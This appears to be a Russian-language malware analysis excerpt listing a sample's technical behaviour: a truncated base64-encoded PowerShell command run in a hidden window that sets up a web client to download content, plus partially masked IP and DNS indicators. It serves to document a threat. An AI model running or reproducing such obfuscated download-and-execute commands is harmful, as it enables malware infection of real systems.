Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AMQBfADUAXwA9ACgAJwBCAF8AXwAnACsAJwBfADIANAA1ACcAKQA7ACQAQQAzADQANwAwADkAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgA2AF8AMgA1ADIAMgA9ACgAJwBoAHQAJwArAC...
- '35.##4.251.94':80
- DNS ASK fo####mafound.org
- DNS ASK po###irale.com
- DNS ASK sa###tgroup.ir
- DNS ASK ed##nta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8AMQBfADUAXwA9ACgAJwBCAF8AXwAnACsAJwBfADIANAA1ACcAKQA7ACQAQQAzADQANwAwADkAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgA2AF8AMgA1ADIAMgA9ACgAJwBoAHQAJwArAC...' (со скрытым окном)